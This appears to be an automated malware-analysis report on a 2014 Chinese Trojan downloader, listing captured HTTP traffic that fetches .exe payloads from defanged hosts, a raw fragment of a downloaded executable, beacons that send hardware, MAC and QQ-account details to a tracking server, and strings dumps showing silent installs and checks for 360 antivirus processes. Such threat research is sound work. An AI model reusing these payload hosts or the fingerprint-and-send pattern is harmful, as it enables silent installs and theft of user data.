User-Agent: NSIS_Inetc (Mozilla)
Host: t.cn
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Location: hXXps://pchome.b0.upaiyun.com/2.ico
Content-Type: text/html;charset=UTF-8
Server: weibo
Content-Length: 217
Date: Sat, 20 Dec 2014 05:13:50 GMT
X-Varnish: 2548699336
Age: 0
Via: 1.1 varnish
Connection: keep-alive
<HTML>.<HEAD>.<TITLE>Moved Temporarily</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Moved Temporarily</H1>.The document has moved <A HREF="https://pchome.b0.upaiyun.com/2.ico">here</A>..</BODY>.</HTML>...
GET /controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3®times=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: gameapp.37.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Dec 2014 05:14:44 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ea0f103f76d0c56ec96c6b4448e34036; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sq_client_data=a%3A6%3A%7Bs%3A7%3A%22game_id%22%3Bs%3A3%3A%22237%22%3Bs%3A5%3A%22refer%22%3Bs%3A10%3A%22feitian_wd%22%3Bs%3A3%3A%22uid%22%3Bs%3A6%3A%22905848%22%3Bs%3A13%3A%22showlogintype%22%3Bs%3A1%3A%223%22%3Bs%3A8%3A%22tpl_type%22%3Bs%3A5%3A%22game1%22%3Bs%3A11%3A%22installtime%22%3Bs%3A8%3A%2220141220%22%3B%7D; path=/; domain=37.com
Set-Cookie: client_type=3; path=/; domain=37.com
37web: zs_12_18_web
2548..<!doctype html>.<html lang="en">.<head>. <meta charset="UTF-8" />. <title>......</title>. <link rel="stylesheet" href="hXXp://img1.37wanimg.com/dts/css/client/game1.css?t=1419052484" />.</head>.<body data-gameid="237">. <div class="container log relative">. <div class="log-form relative">. <p>. <label for="log-username">.........</label>. <input type="text" name="log-username" id="log-username" class="log-username"/><span class="status"></span>. </p>. <7.com/zt/dts/20141209/" target="_blank"><img src="hXXp://img2.37wanimg.com/2014/12/101215116dbQk.jpg" alt=""/></a>.. </div>.. <div class="log-kv-panel">.. <a href="hXXp://dts.37.com/xinwen_20141204_4739/" target="_blank"><img src="hXXp://img2.37wanimg.com/2014/12/04190114Mvpaw.jpg" alt=""/></a>.. </div>.. <div class="log-kv-panel">.. <a href="hXXp://huodong.37.com/zt/dts/20141203/" target="_blank"><img src="hXXp://img2.37wanimg.com/2014/11/19204027FVrEy.jpg" alt=""/></a>.. </div>.. <div class="log-kv-panel">.. <a href="http://dts.37.com/dq/" target="_blank"><img src="hXXp://img2.37w
<<< skipped >>>
GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sat, 20 Dec 2014 05:14:50 GMT
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
Set-Cookie: pt_local_token=1654165040; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Mon, 15 Dec 2014 01:30:00 GMT
Content-type: text/html
Content-Length: 5305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Arial,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-height:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0 0 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_select,.btn_gray{border:0;color:#2473a2;width:103px;height:28px;padding-left:2px;cursor:pointer;font-weight:bold;font-size:14px}.btn_select{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -130px}.btn_gray{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -225px}#login #list_uin img{padding:7px;background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat 0 -329px}#list_uin li{list-style:none;padding:0 0 0 28px; padding-left:12px;width:270px;word-wrap:break-word;min-height:20px;clear:both}#list_uin li input{float:left;margin-bottom:5px;width:20px}#list_uin label{margin:2px 0 0 4px;float:left;width:220px}#login p{padding:8px 15px 12px 32px;margin:0;font-size:12px;color:#535353}.x_lowLogin{padding:10px 0 0 28px;display:none}</style><script>var g_begTime=new Date();..(function(){...window.onerror = function(msg,url,line){....var t = document.createElement('
<<< skipped >>>
GET /yx/dts/sqft/905848/app.ini HTTP/1.1
User-Agent: HTTPDownloader
Host: d.wanyouxi7.com
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:47 GMT
Content-Length: 61
Accept-Ranges: bytes
Content-Type: application/octet-stream
Last-Modified: Thu, 13 Nov 2014 07:23:49 GMT
ETag: "54645c85-3d"
X-Cache: HIT from p05.i01
X-Cache: HIT from c02.i05.
[version].currentversion=3.0.0.0.[recommend].link=.linkname=...
GET /iplookup/iplookup.php HTTP/1.0
Host: int.dpool.sina.com.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:13:54 GMT
Server: Apache
Set-Cookie: U_TRS1=00000026.d6097b1e.54950592.07e9c9db; path=/; expires=Tue, 17-Dec-24 05:13:54 GMT; domain=.sina.com.cn
Set-Cookie: U_TRS2=00000026.d6117b1e.54950592.a16e5f72; path=/; domain=.sina.com.cn
Cache-Control: max-age=120
Expires: Sat, 20 Dec 2014 05:15:54 GMT
DPOOL_HEADER: 10.79.112.38
Content-Length: 26
Connection: close
Content-Type: text/html; charset=GBK
SINA-LB:aGEuMTA4LmczLnlmLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS:ZDc5MjljY2UgMCAwIDAgNCAwCg==
1.-1.-1.....................
GET /ktv/9158chat2_ktv083_98200205.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive
HTTP/1.0 200 OK
Date: Sat, 20 Dec 2014 05:12:45 GMT
Content-Type: application/octet-stream
ETag: "386472367"
Accept-Ranges: bytes
Last-Modified: Thu, 18 Dec 2014 07:15:44 GMT
Content-Length: 15062552
Server: WS CDN Server
Age: 126
Via: 1.0 hbjm166:80 (Cdn Cache Server V2.0), 1.0 nanning16:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....:J.................\...........2.......p....@.......................... ...............................................s...........d..............@............................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data...x............r..............@....ndata...p...@...........................rsrc....d.......f...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..X...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e..9}...Dp@........FP.VT........ M............U....M....3...3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...e....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F..
<<< skipped >>>
GET /Downloaderconfig.aspx?imgtype=9158 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: tj.9158.com
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:50 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 948
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body style=" margin:0px">.. <form name="form1" method="post" action="Downloaderconfig.aspx?imgtype=9158" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTU4MjMyMzI1ZGTU5ZBXmwe1gDNP/W SPke44 A65Q==" />..</div>..<div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="91FFCAD5" />..</div>.. <div>.. .. <object >.. .. <embed src="http://tj.9158.com/temp/flash/1.swf" width="490px" height="180px" quality="high" pluginspage="hXXp://VVV.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" ></embed>.. </object>.. .. </div>.. </form>..</body>..</html>....
GET /controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=237&ext_1=2&ext_2=feitian_wd&ext_3=905848&ext_4=855392B634F846E395634D027DCD1AB4&ext_5=1c4e8afc5f13c9a8784201dba5a3f2e0&ext_6=2&browser_type=3001 HTTP/1.1
User-Agent: HTTPDownloader
Host: a.clickdata.37wan.com
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 20 Dec 2014 05:14:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2757cfd3a4293290c5b7afd7714204f3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
1..1..0..
GET /mmliao/MM-liao8398.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: show.man1234.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Date: Sat, 20 Dec 2014 05:13:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: hXXp://down.cncpa.net:9000/mmliao/MM-liao9906.exe
Set-Cookie: ASP.NET_SessionId=w2k1ic55pk0pnr45szporcfn; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 804
<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://down.cncpa.net:9000/mmliao/MM-liao9906.exe">here</a>.</h2>..</body></html>....<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="../download/SubConfig.aspx?id1=8398" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGQiFbVbBJv7A/lcSr1Og9mkU0lctw==" />..</div>..<div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="9F81D7CC" />..</div>.. <div>.. .. </div>.. </form>..</body>..</html>....
GET /ffdy_238_63518.exe HTTP/1.1
Referer: hXXp://VVV.hanyueyr.com/ffdy_238_63518.exe
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: VVV.hanyueyr.com
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Sat, 20 Dec 2014 05:13:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
location: hXXp://jafaye.ynhaoya.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027
0..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
1419052427l238l63518.exe&_upt=6ec6a9a21419053027_1812:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp\Inetc.dll
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp\Inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp\Inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp\Inetc.dll
NjM1MTguZXhlJl91cHQ9NmVjNmE5YTIxNDE5MDUzMDI3/40.html
NjM1MTguZXhlJl91cHQ9NmVjNmE5YTIxNDE5MDUzMDI3/40.html
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp
TguZXhlJl91cHQ9NmVjNmE5YTIxNDE5MDUzMDI3/40.html
TguZXhlJl91cHQ9NmVjNmE5YTIxNDE5MDUzMDI3/40.html
s.ZM!f
s.ZM!f
@.reloc
@.reloc
MSVCR80.dll
MSVCR80.dll
_crt_debugger_hook
_crt_debugger_hook
Base64.dll
Base64.dll
WS2_32.dll
WS2_32.dll
NSISdl.dll
NSISdl.dll
invalid URL
invalid URL
Host: %s
Host: %s
GET %s HTTP/1.0
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
User-Agent: NSISDL/1.2 (Mozilla)
http=
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u hours remaining)
(%u minutes remaining)
(%u minutes remaining)
(%u seconds remaining)
(%u seconds remaining)
Downloading %s
Downloading %s
URL Parts Error
URL Parts Error
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
REST %d
REST %d
SIZE %s
SIZE %s
Content-Length: %d
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Authorization: basic %s
Proxy-authorization: basic %s
Proxy-authorization: basic %s
%s:%s
%s:%s
FtpCommandA
FtpCommandA
wininet.dll
wininet.dll
%u MB
%u MB
%u kB
%u kB
%u bytes
%u bytes
%d:d:d
%d:d:d
%s - %s
%s - %s
(Err=%d)
(Err=%d)
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
/password
/password
Uploading %s
Uploading %s
&.Gi0
&.Gi0
%Program Files%\1.rar
%Program Files%\1.rar
emp\nsl40.tmp
emp\nsl40.tmp
1.rar
1.rar
Grub4DOS Toolbox for Windows 0.1
Grub4DOS Toolbox for Windows 0.1
am Files\nsu41.tmp
am Files\nsu41.tmp
mp\nsl40.tmp
mp\nsl40.tmp
rogram Files\1.rar
rogram Files\1.rar
ray.exe
ray.exe
360sd.exe
360sd.exe
hXXp://VVV.bangshijz.com
hXXp://VVV.bangshijz.com
hXXp://pchome.b0.upaiyun.com/1.ico
hXXp://pchome.b0.upaiyun.com/1.ico
n/iplookup/iplookup.php
n/iplookup/iplookup.php
p://int.dpool.sina.com.cn/iplookup/iplookup.php
p://int.dpool.sina.com.cn/iplookup/iplookup.php
hXXp://idc.xn--r93a55o.cc/onlines_30863.exe
hXXp://idc.xn--r93a55o.cc/onlines_30863.exe
80.1123.exe
80.1123.exe
onlines_30863.exe
onlines_30863.exe
c:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027
c:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027
%Program Files%
%Program Files%
1419052427l238l63518.exe&_upt=6ec6a9a21419053027
1419052427l238l63518.exe&_upt=6ec6a9a21419053027
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3F.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3F.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v2.46
Nullsoft Install System v2.46
1419052427l238l63518.exe&_upt=6ec6a9a21419053027_1812_rwx_10004000_00001000:
callback%d
callback%d
MM-liao8398.exe_824:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
SSSSh
SSSSh
FtPh
FtPh
tGHt.Ht&
tGHt.Ht&
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
OnTitleChange: text="%s"
homeUrl
homeUrl
downUrl
downUrl
C:\Windows\Temp\temp.icon
C:\Windows\Temp\temp.icon
c://temp.icon
c://temp.icon
ProExe
ProExe
DownloadUrl
DownloadUrl
ErrorUrl
ErrorUrl
AdvertUrl
AdvertUrl
XieyiUrl
XieyiUrl
hXXp://tj.9158.com/Opendownloadernewxml.aspx
hXXp://tj.9158.com/Opendownloadernewxml.aspx
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
**** DISK_GEOMETRY_EX for drive %d ****
**** DISK_GEOMETRY_EX for drive %d ****
Disk is%s fixed
Disk is%s fixed
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
Vendor Id = [%s]
Vendor Id = [%s]
Product Id = [%s]
Product Id = [%s]
Product Revision = [%s]
Product Revision = [%s]
Serial Number = [%s]
Serial Number = [%s]
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
DeviceType: x
DeviceType: x
DeviceTypeModifier: x
DeviceTypeModifier: x
RemovableMedia: %d
RemovableMedia: %d
CommandQueueing: %d
CommandQueueing: %d
BusType: %d
BusType: %d
%d ReadPhysicalDriveInNTWithZeroRights ERROR
%d ReadPhysicalDriveInNTWithZeroRights ERROR
CreateFile(%s) returned INVALID_HANDLE_VALUE
CreateFile(%s) returned INVALID_HANDLE_VALUE
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
Drive%dType
Drive%dType
DriveÜontrollerBufferSize
DriveÜontrollerBufferSize
DriveÜontrollerRevisionNumber
DriveÜontrollerRevisionNumber
Drive%dSerialNumber
Drive%dSerialNumber
Drive%dModelNumber
Drive%dModelNumber
Controller Buffer Size on Drive___: %s bytes
Controller Buffer Size on Drive___: %s bytes
Drive Controller Revision Number__: [%s]
Drive Controller Revision Number__: [%s]
Drive Serial Number_______________: [%s]
Drive Serial Number_______________: [%s]
Drive Model Number________________: [%s]
Drive Model Number________________: [%s]
Drive %d -
Drive %d -
%d ReadPhysicalDriveInNTWithAdminRights ERROR
%d ReadPhysicalDriveInNTWithAdminRights ERROR
No device found at position %d (%d)
No device found at position %d (%d)
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTUsingSmart ERROR
%d ReadPhysicalDriveInNTUsingSmart ERROR
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
Error Code %d
Error Code %d
ERROR: Could not open IDE21201.VXD file
ERROR: Could not open IDE21201.VXD file
\\.\IDE21201.VXD
\\.\IDE21201.VXD
ERROR: Could not SetPriorityClass, LastError: %d
ERROR: Could not SetPriorityClass, LastError: %d
\\.\Scsi%d:
\\.\Scsi%d:
Hard Drive Model Number___________: %s
Hard Drive Model Number___________: %s
Hard Drive Serial Number__________: %s
Hard Drive Serial Number__________: %s
%s (%s:%d)
%s (%s:%d)
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
softlist=%s&lmarkid=%s
softlist=%s&lmarkid=%s
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
w@C:\Windows\Temp\
w@C:\Windows\Temp\
%sDownLoad
%sDownLoad
_%s%s.exe
_%s%s.exe
_%s.exe
_%s.exe
/S /D=%s
/S /D=%s
%sDownLoad\%s
%sDownLoad\%s
Browser=%s
Browser=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
%ld%s%s
%ld%s%s
%d*%d
%d*%d
%s(%s)
%s(%s)
...%d%c
...%d%c
%Program Files%
%Program Files%
%s Inx:%d Offset:%d Len:%d
%s Inx:%d Offset:%d Len:%d
.tmp.tg
.tmp.tg
****ERR:%d,
****ERR:%d,
nInx:%d, offset:%d, siz:%d
nInx:%d, offset:%d, siz:%d
%d, lRemain
%d, lRemain
ConnectSvr:%s
ConnectSvr:%s
X-X-X-X-X-X
X-X-X-X-X-X
SOFTWARE\%s
SOFTWARE\%s
Microsoft Windows 95
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003
Microsoft Windows Server 2003
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2008
Microsoft Windows Server 2008
Microsoft Windows Vista
Microsoft Windows Vista
Microsoft Windows Server 2008 R2
Microsoft Windows Server 2008 R2
Microsoft Windows 7
Microsoft Windows 7
unknown OperatingSystem.
unknown OperatingSystem.
Web Edition
Web Edition
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductName
\StringFileInfo\xx\ProductName
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
http\shell\open\command
http\shell\open\command
%s %s
%s %s
\SogouExe\SogouExe.exe
\SogouExe\SogouExe.exe
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
M.exe
M.exe
deepscan\zhudongfangyu.exe
deepscan\zhudongfangyu.exe
360safe.exe
360safe.exe
ZhuDongFangYu.exe
ZhuDongFangYu.exe
QQ.exe
QQ.exe
T58web
T58web
9158web
9158web
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP/1.1
HTTP/1.1
%s?log=%s&version=20140121
%s?log=%s&version=20140121
hXXp://tj.9158.com/logtest.aspx
hXXp://tj.9158.com/logtest.aspx
:%d,server:%s, ip:%s,
:%d,server:%s, ip:%s,
:url:%s, server:%s,error msg:%s, errcode:%d
:url:%s, server:%s,error msg:%s, errcode:%d
kernel32.dll
kernel32.dll
CNotSupportedException
CNotSupportedException
hhctrl.ocx
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
Afx:%p:%x
commctrl_DragListMsg
commctrl_DragListMsg
CCmdTarget
CCmdTarget
